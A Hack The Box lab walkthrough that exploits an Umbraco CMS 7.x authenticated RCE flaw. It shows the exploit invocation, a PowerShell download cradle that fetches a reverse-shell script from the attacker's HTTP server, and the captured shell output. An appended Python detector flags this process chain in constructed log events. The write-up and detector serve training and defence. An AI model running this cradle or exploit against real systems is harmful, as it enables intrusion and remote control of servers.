Remote Code Execution
As discovered earlier, Umbraco CMS 7.14.2 suffers from an RCE vulnerability.
I will be exploiting that to gain a foothold on the target system.
Exploit
I found an exploit online
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ python3 umbraco_7_12_4_RCE.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]
Umbraco authenticated RCE
options:
-h, --help show this help message and exit
-u USER, --user USER username / email
-p PASS, --password PASS password
-i URL, --host URL root URL
-c CMD, --command CMD command
-a ARGS, --arguments ARGS arguments
The instructions seem straightforward.
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ simplehttp .
serving http on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Hosting the payload over HTTP
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ python3 umbraco_7_12_4_rce.py -u admin@htb.local -p baconandcheese -i http://$IP/ -c 'powershell.exe' -a "-ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.5:8000/Invoke-PowerShellTcp.ps1')"
Executing. I had to play around with the quotation marks due to parsing errors.
The target web application processes picked up the payload.
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.180] 49747
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
ps c:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
ps c:\windows\system32\inetsrv> hostname
remote
ps c:\windows\system32\inetsrv> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::ba
ipv6 address. . . . . . . . . . . : dead:beef::25dd:3404:8d18:2459
link-local ipv6 address . . . . . : fe80::25dd:3404:8d18:2459%12
ipv4 address. . . . . . . . . . . : 10.10.10.180
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%12
10.10.10.2
Initial foothold established on the target system as the iis apppool\defaultapppool user.
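From the defender's side, the chain shown above leaves a distinctive trace: the IIS worker process (w3wp.exe) running as an app-pool identity spawns PowerShell with a download cradle. The following is an added example, not part of the original write-up or the exploit script; the events it scans are constructed to resemble Sysmon Event ID 1 / Security 4688 process-creation fields and are not real telemetry.

```python
"""Added example (not from the original write-up): flag the process chain this
exploit produces, an IIS worker (w3wp.exe) running under an app-pool identity
that spawns PowerShell with a remote download cradle. The events below are
constructed to resemble Sysmon Event ID 1 fields, not real telemetry."""
import re

# Constructed sample events (a field subset of Sysmon / 4688 process creation).
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"IIS APPPOOL\DefaultAppPool",
     "CommandLine": "powershell.exe -ep bypass -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://10.10.14.5:8000/Invoke-PowerShellTcp.ps1')"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "User": r"IIS APPPOOL\DefaultAppPool",
     "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"REMOTE\alice",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Download-cradle and policy-bypass markers, as used in the exploit command line.
CRADLE = re.compile(r"(downloadstring|downloadfile|\biex\b|invoke-expression|"
                    r"-ep\s+bypass|-executionpolicy\s+bypass|net\.webclient)", re.I)

def score(event):
    """Return the reasons an event looks like web-shell style command execution."""
    reasons = []
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    child = event["Image"].rsplit("\\", 1)[-1].lower()
    if parent == "w3wp.exe" and child in SHELLS:
        reasons.append("iis-worker-spawned-shell")
    if event["User"].upper().startswith("IIS APPPOOL\\") and child in SHELLS:
        reasons.append("apppool-identity-shell")
    if child in ("powershell.exe", "pwsh.exe") and CRADLE.search(event["CommandLine"]):
        reasons.append("download-cradle")
    return reasons

def triage(events):
    """Map the index of each suspicious event to its reasons; clean events are omitted."""
    flagged = {}
    for i, event in enumerate(events):
        reasons = score(event)
        if reasons:
            flagged[i] = reasons
    return flagged
```

The first two events reproduce what an Umbraco worker would log during the exploitation above; the third is an ordinary administrator-run script and is left unflagged, which is the false-positive case a rule like this must handle.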